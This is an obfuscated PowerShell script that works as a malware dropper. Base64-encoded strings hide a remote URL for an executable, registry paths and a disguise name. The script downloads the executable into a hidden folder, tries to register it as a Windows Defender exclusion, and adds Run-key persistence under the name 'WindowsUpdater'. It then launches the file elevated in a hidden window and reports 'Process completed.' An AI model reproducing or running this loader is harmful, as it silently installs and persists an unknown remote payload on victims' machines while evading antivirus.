$c1='aHR0cHM6Ly94OGFqYmk1N2gxLmNlbnRyYWx1cy5jbG91ZGFwcC5henVyZS5jb20vdGVzdHByb2plY3QuZXhl'
$c2='dGVzdHByb2plY3QuZXhl'
$c3='SGlkZGVu'
$c4='U2lsZW50bHlDb250aW51ZQ=='
$c5='U3RvcA=='
$c6='RGlyZWN0b3J5'
$c7='SENVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93cyBEZWZlbmRlclxFeGNsdXNpb25zXFBhdGhz'
$c8='SENVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4='
$c9='V2luZG93c1VwZGF0ZXI='

$d1=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c1))
$d2=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c2))
$d3=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c3))
$d4=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c4))
$d5=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c5))
$d6=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c6))
$d7=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c7))
$d8=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c8))
$d9=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c9))

$w1=Join-Path $env:LOCALAPPDATA ([System.Guid]::NewGuid().ToString())
New-Item -ItemType $d6 -Path $w1 -EA $d4|Out-Null
$w2=Join-Path $w1 $d2

function Get-Info{param([string]$p);try{$h=Get-WmiObject Win32_OperatingSystem -EA $d4;return $h.Caption}catch{return $null}}

function Set-Config1{param([string]$p);try{if(Test-Path $d7){$v=(Get-ItemProperty -Path $d7 -EA $d4).PSObject.Properties.Value;$n=[System.IO.Path]::GetRandomFileName();New-ItemProperty -Path $d7 -Name $n -Value $p -PropertyType String -Force -EA $d4|Out-Null}}catch{}}

function Set-Config2{param([string]$p);try{New-ItemProperty -Path $d8 -Name $d9 -Value $p -PropertyType String -Force -EA $d4|Out-Null}catch{}}

$i=Get-Info -p $w1
Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 300)

try{
$wc=New-Object System.Net.WebClient
$wc.DownloadFile($d1,$w2)
(Get-Item $w1).Attributes=$d3
(Get-Item $w2).Attributes=$d3
Set-Config1 -p $w2
Set-Config2 -p $w2
$pi=New-Object System.Diagnostics.ProcessStartInfo
$pi.FileName=$w2
$pi.WindowStyle=$d3
$pi.Verb='RunAs'
$p=[System.Diagnostics.Process]::Start($pi)
$p.WaitForExit()
Remove-Item $w1 -Recurse -Force -EA $d4
}catch{exit 1}finally{Write-Host "Process completed."}